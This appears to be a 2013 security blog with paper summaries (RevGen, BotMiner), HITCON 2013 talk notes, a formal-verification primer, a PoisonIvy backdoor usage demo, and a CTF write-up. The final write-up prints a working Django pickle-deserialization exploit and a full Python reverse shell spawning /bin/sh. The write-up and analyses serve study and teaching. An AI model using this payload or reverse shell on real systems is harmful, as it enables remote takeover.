2013年8月23日 星期五

Paper Reading : Enabling Sophisticated Analyses of x86 Binaries with RevGen

This paper is proposed in HotDep'11.
This paper is aim to ease the difficulty of binary analysis by RevGen, which translating tradition x86 binary into LLVM IR instead of ad-hoc IR, which use by different system.

There are many different system for binary program analysis, for example, BitBlaze and CodeSurfer. However they use their own IR language which hard to migrate to other system and without formalize verify.

LLVM, a popular compiler framework, have been widely used in many analysis tool. For example,
KLEE and Parfait are both LLVM-based.

LLVM

LLVM is a compile framework with a compact RISC-like instruction set. It support unlimit register and only contain 30 opcodes, which ease to analysis. Especially, only load and store can access memory.
LLVM naturelly support Static Single Assignment(SSA) code representation. So data flow and def-use graph can be compute. Moreover function inlining, constant propagation, or dead store removal can also achive.
To translate binary code into LLVM, following issue must be concern
  • pointer arithmetic 
  • accommodate different stack layouts
  • transform accesses to various code and data segments
  • deal with indirect call
  • semantic equivalent LLVM programs.

Challenge


  1. Extracting binary code's semantics
  2. Inferring type information

RevGen




Translating Blocks of Binary Code

1. Disassemble into micro-operations, which translate to LLVM instructions later.
2. One to one mapping between micro-operations and LLVM instructions.

Reconstructing the Control Flow Graph (CFG)

1. Each code block is translate to LLVM block, and form the functions.
2. Connect each functions with call instructions.

 Obtaining Analyzable LLVM Programs

This part the symbol table contain library call and relocation table are provide to identify some constant address. Then translation can be complete.

Paper Reading : BotMiner: Clustering Analysis of Network Traffic for Protocol- and Structure-Independent Botnet Detection

BotMiner is proposed in Usenix'08 by College of Computing, Georgia Institute of Technology.
In this paper, authors aim to detect c&c botnet without a priori knowledge. The key concept of this paper is to cluster malicious behaviors and communication traffic separately and mining  relation between them. Their system achieve a good detection rate in their evaluation.

Introduction

In this section, authors introduce current state of botnet. Classificaton of botnet is list below.
IRC Botnet, include 
P2P Botnet, include Nugache and Storm/Peacomm

Related Work

Most related work are specific to IRC and HTTP protocols,which are most widest used by C&C botnet. This paper proposed a system to detect arbitrary protocols communications.

Definition and Assumption

The authors define the botnet as "A coordinated group of malware instances that are
controlled via C&C channels".  That is, it is unavoidable for bot to communicate to other bot/bot server and it necessary for a bot to bring out some malicious activities. 

Proposed Scheme

The architecture of botMiner is in the figure.
In order to detect bot in a network, BotMiner follow two observation, "who is talking to whom" and "who is doing what". Therefore the system is divide to C-Plan and A-Plan.
  • C-Plan is responsible for communication
    C-Plan Monitor employ hardware supporting(Cisco, Juniper) to log network traffic. 
  • A-Plan is responsible for activities
    Snort with SCADE (Statistical sCan Anomaly Detection Engine) plugin is used to implement A-Plan Monitor.
In C-Plan Cluster, noise connections and white list connection are first filtered out. Then the two-level cluster is processed, from course grain to fine grain. The aggregating of some attributes are calculated
  1. the number of flows per hour(fph)
  2. the number of packets per flow(ppf)
  3. the average number of bytes per packets(bpp)
  4. the average number of bytes per second (bps)
After those feature are computed, X-mean, an K-means variant algorithms, is used to cluster in different feature space to implement course grain and fine grain cluster. X-mean can cluster without pre-define clustering number. X-means runs multiple rounds of K-means to find proper number of clustering with help of Bayesian Information Criterion. Similar approach is used in A-Plan cluster.

Finally,  cross-check clusters is taken to find out intersections that infers exists of botnet.

2013年8月16日 星期五

HITCON 2013 Session Summary : Advance Malware Evasion And Hiding Techniques

This session is origin in HITCON 2013, proposed by Chong Rong Hwa from FireEye

Attack Vector

In this session, first three type of infection vectors are discussed
  1. Physical, like USB
  2. Email
    Compress, Encryption, Password protected compression
  3. Web
    Water Hole Attack, which attacker compromise legitimate website to host malicious page.
    ex. May 1 2013, attacker compromise US Department of Labour to host PoisonIvy Backdoor

APT Advanced Malware

Those malware not use advance technique but disguise itself as normal program or user.

Hacker may use old vulnerabilities, but slightly change the exploit code to harden the analysis.
    Add invalid characters in rtf file to confuse parser
    Replace part of shellcode to semantic-equivalent instructions

Save non-malicious code in disk, construct malicious payload in the memory
    Trojan.APT.BaneChant

Employ common used encryption(signature) algorithms with slightly change(ex. DES,AES)
Use public and legitimate service for malicious behaviors, such as : google drive, amazon aws
    Trojan.APT.Seinup
Anti-VM
   Detect human behaviors

APT Attack Source

Not from single source and the control servers are distributed over the world.
      Asia and East Europe are two most source region for APT attack. 
      Most of APT tool made in China, ex. Gh0stRAT

2013年8月15日 星期四

HITCON 2013 Overview


Cyber War

  1. People's Republic of Cyber Warfare: Comparing China Iran & Russia Militarization of Cyberspace(駭客人民共和國: 中國伊朗跟俄羅斯網軍的分析與比較)
  2. Global Cyber Espionage and Chinese Hacker Threats, Internet Survillance and PRISM(全球間諜:互聯網監控全球趨勢 棱鏡門與中國駭客威脅論)
  3. APT1: Technical Backstage(APT1: 反攻網軍後台)
  4. How South Korea Makes White-hat Hackers(南韓如何培養白帽駭客?)
  5. How does Japan dea with Targeted Attack and SCADA Security(目標鎖定攻擊與工控系統安全:日本如何應對兩大趨勢)
Cyber War is the main topic of HITCON 2013. Hence many session about global cyber activity are included.
In first two presentation talk about national power of cyber war, include China, Iran and Russia. And also mention about chineese hacker and  Internet survillance of U.S.
Second, Paul Rascagneres from malware.lu share their experience to track APT1 hacker,which probable come from china.
Then, national strategy of Japan and Korean, which are two countries near TW, is mentioned. 

APT

  1. APT defense from the view of security architecture(從系統設計建置面談 APT 防禦)
  2. Visual Data Analytics - Graphing your Indicators(APT 特徵的視覺資料分析法)
  3. Digital Eagle Eye System: Use Cyber Intelligence against APT Attacks(數位鷹眼系統: 以網路數位情資對抗 APT 攻擊)
  4. APT Cyber Shuttle: From Automated Analysis to TTP Observation(APT網際飛梭:從自動化分析到拆解 APT 後台駭客活動)
  5. Light & Shadow about Banking $ecurity @Japan(光與影 日本銀行業的資訊安全)
In HITCON 2013, APT is still one of hottest topic. In those session, management and strategy against APT is discussed. And some forensics technique are also proposed to face APT attack.
Notice that, the session "APT Cyber Shuttle: From Automated Analysis to TTP Observation" proposed by Xecure-Lab & Academia Sinica will give a session in Black Hat US 2013.

Malware

  1. Building new weapons for malware analysts(建立惡意軟體分析的新武器)
  2. Advance Malware Evasion and Hiding Techniques(惡意軟體的進階免殺技巧)
  3. Static Analysis and Dynamic Instrumentation for Intelligent Exploit Analysis(靜態與動態智慧型漏洞文件分析系統)
Malware analysis is a old discussion problem. In this year, some session about malware are also included.

Mobile


  1. Escaping Android Dynamic Analysis; Chinese New Year Train Ticket Ordering Day(逃離安卓動態檢測 & 訂票助手一日談)
  2. Dex Education 201: Anti-Emulators(深入Dalvik Dex教學:反制模擬器)
  3. Android Hooking Attack
  4. Review of Security Vulnerabilities on the Android Platform(Android平臺安全性漏洞回顧)
  5. GSM Security Research using Open Soruce Tools(以開源軟體進行GSM安全研究)

With exponent usage of mobile device, sessions about mobile are also increasing. The first two sessions mention about how malware evade security analysis mechanism. Then the following two sessions is about technique employed by malware. Especially, "Review of Security Vulnerabilities on the Android Platform" ,proposed by 肖梓航 Claud, which overview the android vulnerabilities in current year is worthy to read.

Exploit & Vulnerability


  1. Life of Coder: The adventure through the landscape of bugs(程序員的蟲洞漂流)
  2. Analysis on the EPATHOBJ Exploit(請謹慎編碼,哪怕它只是一句錯誤處理— 來自 win32k!EPATHOBJ::pprFlattenRec 漏洞的啟示)
  3. Killing AV in x64(戳戳防毒軟體死穴)
  4. 0-Day Easy Talk - Happy Fuzzing Internet Explorer(0-Day 輕鬆談 - Happy Fuzzing Internet Explorer)
  5. How can i have 100 0day for just 1day(超級祕訣 - 一天擁有 100 個 0day!)
  6. Exploiting JRE (JRE安全机制与漏洞挖掘研究)
Exploit and Vulnerability is an interesting topic this year. An 0 day sharing activity is also include in this year's HITCON.
In first three sessions, the authors analysis some known exploit and  share their implementation. The fourth session, the author demonstrate the 0-day he found and share his experience.
The fifth talk present an idea to fuzz numerous of application at once. The last one session conclude java vulnerabilities in current day and the direction to fuzz java platform.

Others


  1. The undisclosed files of incidents by the data scientist(資料科學家未曾公開之資安研究事件簿)
  2. OS X Rootkits Stuff(那些洞,我們一起追的 OS X Rootkits)
  3. Spears and shields on online game(線上遊戲矛盾大對決)
  4. Breaking image CAPTCHA for fun(CAPTCHA 好好玩)
  5. Protocol and physical analysis of EMV POS devices.(EMV晶片卡POS裝置的實體與溝通協定分析)
  6. Browser and Local Zone(瀏覽器和本地域)
The session "The undisclosed files of incidents by the data scientist" talk about some research topic of professor 陳昇瑋. Social network and malicious phone call are both special and interesting topic.
Also web security are widely discussed in Black Hat 2013, there are less topic about web security in this year's HITCON.  

2013年8月11日 星期日

CVE-2013-1763 : Local Privilege Escalation Vulnerability

This vulnerability is published in February, it can make normal user gain power of super user. Ubuntu 12.x is vulnerable. So I download the POC code and test it. The result is successful.

Formal Verification for Cryptography Protocols

In this year's S&P conference, Microsoft and INRIA has proposed a paper "Implementing TLS with Verified Cryptographic Security." In this paper, an F# TLS library was implemented and serial of formal proof were  also given. To understand their survey, some background knowledge are necessary. After some search, the slide published in etaps12 is most easily document. So in this article, I will summary this slide.

Attack Model

The attack model is communication in an insecure network environment as following figure


  • The attacker can intercept all messages sent on the network
  • He can compute messages
  • He can send messages on the network
The term cryptographic primitives means basic cryptographic function which later used to build security protocols.

Symbolic Model and Computational Model 

Model Symbolic Model Computational Model
Cryptographic Primitives blackboxes functions on bitstrings
Messages terms on cryptographic primitives bitstrings
Attack Capability Compute with cryptographic primitives Probabilistic polynomial-time Turing machine
Security Assumptions Verify what attacker can do Verify what attacker cannot do

Verifying Protocols in the Symbolic Model

The basic idea is to compute the knowledge of attacker. So we exhaust all combination of cryptographic primitives. Then check if any of them violate security policy. It is trivial that those combination can be infinite, thus this model can be undecidable. So some technique like approximation, proper subset or termination state are used.
For example, Horn Clauses can be use to verify symbolic model. With the notation attacker function
                                             attacker(M) means “the attacker may have M”
And there introduce two functions
       Construct f( m1 ,m2 ,m3 ,...,mn ) 
              attacker( m1 ) ^ attacker( m2 ) ^ ... ^ attacker( mn ) -> attacker( f(m1, m2,..., mn) )  
       Destruct g(m1,m2,...,mn) -> m
              attacker( m1 ) ^ attacker( m2 ) ^ ... ^ attacker( mn ) -> attacker( m )
       Example
              attacker(m) ∧ attacker(k) → attacker(sencrypt(m, k))
              attacker(sencrypt(m, k)) ∧ attacker(k) → attacker(m)

Verifying Protocols in the Computational Model

There are thee strategy to verify the computational model
  1. Linking the symbolic and the computational models
    First, proof in symbolic model and verify computation soundness in symbolic model. Then we can prove the computatiobal model is secure. 
  2. Adapting techniques from the symbolic models
    Some symbolic techniques can also be adapted to the computational model
  3. Direct computational proofs
    Proofs in the computational model are typically proofs by sequences of games

Reference 

  1. Bruno Blanchet's presentation slide(1)
    http://www.mpi-inf.mpg.de/vtsa11/slides/blanchet/VTSA11intro.pdf
  2. Bruno Blanchet's presentation slide(2) 
    http://www.mpi-inf.mpg.de/vtsa11/slides/blanchet/VTSA11proverif.pdf
  3. Bruno Blanchet's presentation slide(3)
    http://cs.ioc.ee/etaps12/invited/blanchet-slides.pdf



2013年8月8日 星期四

PoisonIvy Remote Administration Tool

In this article, I will talk about PoisonIvy and demo it's usage.
PoisonIvy is a remote administration tool, which is widely used by hackers as the backdoor.
There are some news about PoisonIvy:

Usage Demostration

In PoisonIvy Server Profile, we can config the server.

In this tab, address and password can be set. Proxy attribute can also be set in this tab.
The next tab, install, is used to config how the backdoor startup. Such as autostart and executable name is included.

Some advantage attribute like process injection, persistent and key logger are contained.
After generation, a backdoor will be generated. Then we create correspond client and  execute the backdoor in another machine.
After a success infection, a message will showed. And we can get some basic information about victim.

 Then we can retrieve some system information about victim's machine.


Next step, we can create a remote shell to victim.

Moreover, we can also get the remote desktop of victim.



HITCON 2013 Write Up: Pwned 500

In this problem, a django website was given with it's source code available here. Browsing all the files in the repo, we can find two thing interesting in settings.py.
  1. The session engine is "django.contrib.sessions.backends.signed_cookies"
  2. The SECRET_KEY  is also provided in source code.
When signed_cookies is used, every cookie with sessionid field will treated as  serialized data. Then pickle is used to deserialize. While pickle library is unsafe once it is not apply to ordinary type. So we can follow the document here and complete the attack process. Note that reference document also provide reference code which is wealthy to read.

With following python code, we can convert connback.py into pickle format and invoke the program once pickle.loads() is called to de-serialize.
code = b64(open('connback.py').read())

class ex(object):
    def __reduce__(self):
        return ( eval, ('str(eval(compile("%s".decode("base64"),"q","exec"))).strip("None")'%(code),) )
payload = pickle.dumps(ex())

And we can prepare a reverse shell as follow
socket.setdefaulttimeout(60)
sok = None
try:
    sok = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sok.connect((host,port))
    sok.send('!P0Wn! Congratulation !!\n') 
    save = [ os.dup(i) for i in range(0,3) ]
    os.dup2(sok.fileno(),0)
    os.dup2(sok.fileno(),1)
    os.dup2(sok.fileno(),2)
    shell = subprocess.call(["/bin/sh","-i"])
    [ os.dup2(save[i],i) for i in range(0,3)]
    [ os.close(save[i]) for i in range(0,3)]
    os.close(sok.fileno())
except Exception:
    pass

Finally, we start a nc for reverse shell to connect and excute exploit.py to retrieve return shell.
bletchley@Viking:~/WorkSpace/2013_Django/pwp-master$ python exploit.py '1%idg#a2%byqh@l1wcv^3kc=e*($0v44(u-c^@bf_lz-@#essk' http://vuln-django.orange.tw
Sending payload, check you listenner